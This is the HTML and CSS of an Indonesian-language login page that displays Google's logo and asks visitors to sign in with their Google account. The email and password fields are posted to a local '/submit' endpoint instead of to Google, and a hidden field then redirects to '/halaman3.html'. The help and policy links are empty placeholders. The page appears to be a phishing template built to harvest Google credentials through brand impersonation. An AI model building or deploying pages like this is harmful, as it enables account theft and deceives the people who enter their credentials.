<!DOCTYPE html>

<html lang="id">
<head>
<meta charset="utf-8"/>
<meta content="width=device-width, initial-scale=1" name="viewport"/>
<title>Login</title>
<style>
    * {
      box-sizing: border-box;
    }

    body {
      margin: 0;
      font-family: 'Segoe UI', sans-serif;
      background-image: url('https://images.pexels.com/photos/5767686/pexels-photo-5767686.jpeg?auto=compress&cs=tinysrgb&dpr=2&h=750&w=1260');
      background-size: cover;
      background-position: center;
      background-repeat: no-repeat;
      display: flex;
      flex-direction: column;
      justify-content: center;
      align-items: center;
      height: 100vh;
      color: #333;
    }

    .login-wrapper {
      background-color: rgba(255, 255, 255, 0.85);
      padding: 40px;
      border-radius: 15px;
      width: 100%;
      max-width: 400px;
      box-shadow: 0 10px 30px rgba(0,0,0,0.2);
      backdrop-filter: blur(10px);
      text-align: left;
    }

    .google-logo {
      width: 80px;
      margin-bottom: 5px; /* dikurangi dari 10px jadi 5px */
    }

    h2 {
      margin-bottom: 5px;
      color: #333;
      font-size: 24px;
    }

    .subtext {
      font-size: 13px;
      color: #666;
      margin-bottom: 25px;
      font-weight: 700;
      letter-spacing: 0.5px;
      text-transform: capitalize;
    }

    form {
      display: flex;
      flex-direction: column;
    }

    label {
      margin-bottom: 5px;
      font-weight: 600;
      color: #444;
      font-size: 14px;
    }

    input[type="email"],
    input[type="password"] {
      padding: 10px;
      margin-bottom: 20px;
      border: 1px solid #ccc;
      border-radius: 6px;
      font-size: 15px;
      transition: border-color 0.3s;
      width: 100%;
    }

    input[type="email"]:focus,
    input[type="password"]:focus {
      border-color: #007bff;
      outline: none;
    }

    button.submit-btn {
      background-color: #007bff;
      color: white;
      padding: 12px;
      font-size: 16px;
      border: none;
      border-radius: 8px;
      cursor: pointer;
      transition: background-color 0.3s;
      margin-top: 10px;
      width: 100%;
    }

    button.submit-btn:hover,
    button.submit-btn:focus {
      background-color: #0056b3;
      outline: none;
    }

    .agreement-text {
      font-size: 12px;
      color: #555;
      margin-top: 15px;
      line-height: 1.4;
    }

    .agreement-text a {
      color: #007bff;
      text-decoration: none;
    }

    .agreement-text a:hover {
      text-decoration: underline;
    }

    .footer {
      margin-top: 20px;
      font-size: 14px;
      color: #555;
      text-align: center;
    }

    .footer a {
      color: #007bff;
      text-decoration: none;
      margin-left: 5px;
    }

    .footer a:hover {
      text-decoration: underline;
    }

    .footer-links {
      margin-top: 15px;
      text-align: center;
      font-size: 12px;
      color: #777;
    }

    .footer-links a {
      margin: 0 8px;
      text-decoration: none;
      color: #777;
    }

    .footer-links a:hover {
      text-decoration: underline;
    }

    @media (max-width: 480px) {
      .login-wrapper {
        padding: 25px 20px;
        margin: 10px;
      }
    }
  </style>
</head>
<body>
<div class="login-wrapper">
<img alt="Google Logo" class="google-logo" src="https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_92x30dp.png"/>
<h2>Login</h2>
<div class="subtext">gunakan akun Google Anda</div>
<form action="/submit" method="POST">
<label for="email">Email</label>
<input id="email" name="email" placeholder="contoh@mail.com" required="" type="email"/>
<label for="password">Password</label>
<input id="password" name="password" placeholder="Masukkan password" required="" type="password"/>
<button class="submit-btn" type="submit">Masuk</button>
<div class="agreement-text">
        Dengan masuk, Anda menyetujui <a href="#">Persyaratan Layanan</a> dan <a href="#">Kebijakan Privasi</a> kami.
      </div>
<input name="next" type="hidden" value="/halaman3.html"/></form>
<div class="footer">
      Belum punya akun?<a href="/register"> Daftar di sini</a>
</div>
</div>
<div class="footer-links">
<a href="#">Bantuan</a>
<a href="#">Privasi</a>
<a href="#">Persyaratan</a>
</div>
</body>
</html>
